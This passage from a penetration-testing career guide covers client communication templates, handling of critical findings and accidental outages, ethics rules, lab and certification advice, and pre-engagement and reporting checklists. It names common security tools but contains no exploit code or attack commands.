Daily Updates (For Multi-Day Engagements):
Subject: Pentest Day 3 Update - Client XYZ
Progress:
- Completed: Web application authentication testing
- In Progress: API endpoint authorization testing
- Planned: Network segmentation testing (tomorrow)
Preliminary Findings:
- 2 High severity issues identified (details in final report)
- 5 Medium severity issues identified
- No critical issues yet
Blockers:
- Awaiting VPN credentials for internal network testing
- Need staging environment URL for safe destructive testing
ETA: Final report delivery Friday EOD
When You Find Something Critical:
Subject: URGENT - Critical Finding Requires Immediate Attention
Team,
During testing today at 2:35 PM EST, I discovered a critical SQL injection
vulnerability that allows unauthenticated attackers to extract the entire
user database, including password hashes.
Affected Endpoint: https://client.com/api/search
I have NOT extracted any actual customer data. I've verified the vulnerability
exists and stopped.
Recommendation: This endpoint should be taken offline immediately until patched.
I will provide full details in a private call or encrypted email.
This finding will be documented in the final report with full PoC.
2. Handling Disagreements with Developers
The Scenario: You report a finding as “High” severity. The developer responds: “This isn’t a real issue because [technical reason].”
Bad Response:
"You're wrong. This is a high severity vulnerability. Fix it."
Professional Response:
"Thank you for the feedback. I understand your concern about [technical reason].
Let me clarify the exploitation scenario:
[Provide additional context, explain the attack chain, reference similar CVEs]
However, I'm open to discussion. If there's a mitigating control I'm not
aware of, or if you believe the severity should be adjusted based on your
environment, let's discuss.
Could we schedule a 15-minute call to walk through it together?"
Key Principles:
- Stay calm and professional
- Provide additional evidence
- Be open to being wrong
- Offer to demonstrate live
- Document the disagreement in the report if unresolved
3. The “No Findings” Report (Doing This Right)
The Worst Thing: You found nothing and you’re panicking. So you inflate minor issues to seem valuable.
The Right Approach:
Executive Summary:
During this penetration test, no critical or high-severity vulnerabilities
were identified in the in-scope systems. This is a positive result and
reflects strong security practices.
Several medium and low-severity findings were identified related to
defense-in-depth improvements. While these do not represent immediate
risk, addressing them will further harden the security posture.
Key Positive Observations:
- Strong input validation across all tested endpoints
- Properly implemented authentication and authorization controls
- Security headers correctly configured
- Regular patching schedule evident from software versions
Recommendations for Continuous Improvement:
[List legitimate improvements without inventing vulnerabilities]
Remember: A clean test is a GOOD result. Don’t invent problems to justify your fee.
4. Working with Clients Who Don’t Understand Security
The Challenge: You explain a technical vulnerability, and the client says, “I don’t understand why this matters. Can’t you just show me something scarier?”
Bad Approach: Get frustrated and use more jargon.
Good Approach: Translate to business impact.
Technical Explanation (They Don’t Care):
"The application is vulnerable to SQL injection via the search parameter
due to improper parameterization of the database query. An attacker can
use a UNION-based injection technique to exfiltrate data from arbitrary
tables."
Business Impact Translation (They Care):
"I found a way for someone on the internet, with zero credentials, to
download your entire customer database! including names, addresses, payment
information, and Social Security numbers.
This would mean:
- Regulatory fines (GDPR: up to β¬20M or 4% of revenue)
- Mandatory breach notification (legal requirement)
- Customer lawsuits
- Reputational damage and customer churn
- Competitive intelligence leak
Similar breaches at [comparable company] resulted in [specific outcome].
This needs to be fixed urgently, before the next production deployment."
Part 7: Career Development and Continuous Learning
1. Building Your Lab Environment
Don’t just rely on client engagements for practice. Build your own lab:
Essential Lab Components:
β Virtualization: VirtualBox or VMware
β Kali Linux (attacking machine)
β Metasploitable 2 & 3 (vulnerable targets)
β DVWA (Damn Vulnerable Web Application)
β WebGoat / Juice Shop (modern vulnerable apps)
β Vulnerable VMs: VulnHub, HackTheBox retired machines
β Your own apps: Intentionally vulnerable code you write
Practice Scenarios:
Weekly Challenge Ideas:
- Monday: Find 3 different ways to exploit a SQLi vulnerability
- Tuesday: Practice writing PoCs for last week's findings
- Wednesday: Try to bypass a WAF (use free WAF like ModSecurity)
- Thursday: Practice report writing for a mock finding
- Friday: Learn a new tool or technique
2. Learning from Public Disclosures
Resources to Study:
- HackerOne Disclosed Reports: Real findings, real impact, real PoCs
- CVE Databases: Study how professionals describe vulnerabilities
- Bug Bounty Write-ups: Learn creative attack chains
- Pentest Reports: Search for published reports (PDF search: “pentest report filetype:pdf”)
How to Study:
For Each Vulnerability You Study:
1. Read the full disclosure
2. Set up a local test environment
3. Try to reproduce the vulnerability yourself
4. Write your own PoC (practice documentation)
5. Think about variants (what if this was in a different context?)
6. Add to your personal knowledge base
3. Specialization vs. Generalization
Year 1-2: Be a generalist. Learn everything:
- Web application testing
- Network penetration testing
- Wireless security
- Social engineering basics
- Report writing
- Client communication
Year 3+: Consider specializing:
- Web/API Security: Modern applications, GraphQL, microservices
- Cloud Security: AWS/Azure/GCP pentesting, container security
- Mobile Security: iOS/Android app pentesting
- IoT/Embedded: Firmware analysis, hardware hacking
- Red Teaming: Advanced persistent threat simulation
- Application Security: Working with dev teams, secure SDLC
4. Certifications That Actually Matter
For Beginners:
- OSCP (Offensive Security Certified Professional): Industry standard
- CEH (Certified Ethical Hacker): Recognized but less technical
- eJPT (eLearnSecurity Junior Penetration Tester): Good starting point
For Intermediate:
- OSWE (Offensive Security Web Expert): Web app focus
- OSEP (Offensive Security Experienced Penetration Tester): Advanced
- GWAPT (GIAC Web Application Penetration Tester): Web-focused
For Advanced:
- OSEE (Offensive Security Exploitation Expert): Exploit development
- OSCE3 (Offensive Security Certified Expert 3): Master level
- GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)
Reality Check: Certifications open doors, but real-world experience and a strong portfolio matter more. Focus on practical skills.
Part 8: The Professional Mindset
1. Understand Your Role
You’re not a hacker trying to “pwn” the client. You’re a trusted security consultant helping them improve.
Your Real Job:
- Identify risks before real attackers do
- Provide actionable remediation guidance
- Help prioritize security investments
- Build trust through professionalism
- Educate the team about security
2. The Ethics That Keep You Employed
Never:
- β Test out of scope “just to see”
- β Download/keep client data beyond what’s necessary for PoC
- β Share client information (even anonymized war stories at conferences)
- β Use vulnerabilities for personal gain
- β Exaggerate findings to increase your value
- β Perform testing during non-agreed hours
- β Attack production systems without explicit permission
Always:
- β Document everything contemporaneously
- β Communicate proactively about significant findings
- β Stop if you encounter unexpected sensitive data
- β Respect privacy laws and regulations
- β Get written approval before unusual tests
- β Provide value beyond just running tools
3. When Things Go Wrong (Incident Response)
Despite all precautions, sometimes things break. How you handle it defines your professionalism.
Scenario: You accidentally caused a denial of service:
Bad Response:
*Panics*
*Stops testing*
*Hopes nobody notices*
*Doesn't document it*
Professional Response:
Immediate Actions (within 5 minutes):
1. STOP the attack immediately
2. Document exactly what you did and when
3. Contact the client emergency contact
4. Provide full disclosure of what happened
5. Assist with recovery if needed
Email Template:
---
Subject: URGENT - Testing Impact Notification
Team,
At [TIME] during authorized testing, I executed [SPECIFIC ACTION]
which has caused [IMPACT] to [SYSTEM].
What happened:
[Technical explanation]
Current status:
[System state]
What I've done:
- Stopped all testing immediately
- Documented the incident
- Standing by to assist with recovery
What I recommend:
[Recovery steps]
I take full responsibility and am available for immediate discussion.
Full incident details will be included in the final report.
---
Key Principle: Honesty and immediate disclosure turn accidents into trust-building moments.
4. Continuous Improvement
After Every Engagement:
Self-Review Questions:
β What did I learn technically?
β What communication could have been better?
β Which tools worked well? Which didn't?
β What would I do differently next time?
β What feedback did the client provide?
β Which findings took longest to verify? Why?
β What false positives wasted my time?
Keep a Personal Knowledge Base:
Organize by:
- Vulnerability type
- Technology stack
- Bypass techniques
- Useful payloads
- Tool commands
- Report templates
- PoC scripts
- Lessons learned
Conclusion: From Tester to Trusted Advisor
The journey from junior pentester to seasoned professional isn’t just about technical skills.. it’s about building trust, communicating clearly, and delivering undeniable value.
The Reality Check:
- Your first few reports will be torn apart by senior reviewers. That’s good. Learn from it.
- You’ll make mistakes. Own them, document them, and don’t repeat them.
- Clients don’t remember how many vulnerabilities you found. They remember how professional you were.
The Three Pillars of Professional Pentesting:
- Technical Excellence: Master your craft, stay current, validate everything
- Communication: Translate technical jargon to business impact, write clear reports, be responsive
- Ethics: Respect boundaries, protect data, build trust
Your Success Formula:
Technical Skills Γ Communication Γ Professionalism = Career Success
Without communication: Smart but ineffective
Without professionalism: Skilled but unemployable
Without technical skills: Professional but useless
You need all three.
Final Thoughts:
Every expert pentester you admire was once where you are now.. confused, overwhelmed, making mistakes. The difference is they kept learning, kept improving, and kept pushing forward.
Your job isn’t to prove you’re the smartest person in the room. Your job is to provide so much value, clarity, and undeniable proof that the client can’t help but fix the issues and invite you back.
Be curious, be thorough, be professional, be ethical. That’s how you build a lasting career in this field.
Now go forth and test responsibly. π‘οΈ
Appendix: Quick Reference Checklists
Pre-Engagement Checklist
β Scope document signed by all parties
β Rules of engagement clearly defined
β IP ranges and domains explicitly listed
β Testing timeframe agreed upon
β Emergency contacts documented
β Out-of-scope items clearly identified
β Data handling procedures established
β Legal authorization confirmed
β Insurance/liability coverage verified
β Kickoff call completed
Testing Day Checklist
β VPN/access credentials verified
β Testing tools updated
β Logging/evidence capture configured
β Backup of test environment (if applicable)
β Emergency contact numbers accessible
β Scope document readily available
β Note-taking system ready
β Client communication channel established
Report Delivery Checklist
β All findings manually verified
β False positives removed
β Duplicates consolidated
β Evidence organized and labeled
β Screenshots cropped and annotated
β PoCs tested and documented
β Severity ratings justified
β Executive summary written
β Remediation guidance provided
β Grammar/spelling checked
β Sensitive data redacted
β Report reviewed by senior (if possible)
Essential Tools Reference
Reconnaissance:
- nmap, masscan (network scanning)
- amass, subfinder (subdomain enumeration)
- whois, dig, host (DNS investigation)
Web Application:
- Burp Suite (intercepting proxy)
- OWASP ZAP (alternative proxy)
- sqlmap (SQL injection)
- Nikto (web server scanner)
Exploitation:
- Metasploit (exploitation framework)
- SearchSploit (exploit database search)
- Hydra (authentication brute-force)
Documentation:
- CherryTree / Joplin (note-taking)
- Greenshot / Flameshot (screenshots)
- OBS Studio (screen recording)
Remember: Tools are enablers, not replacements for critical thinking. The best pentester is one who understands why something is vulnerable, not just how to exploit it.
Good luck, and happy (ethical) hacking! π―
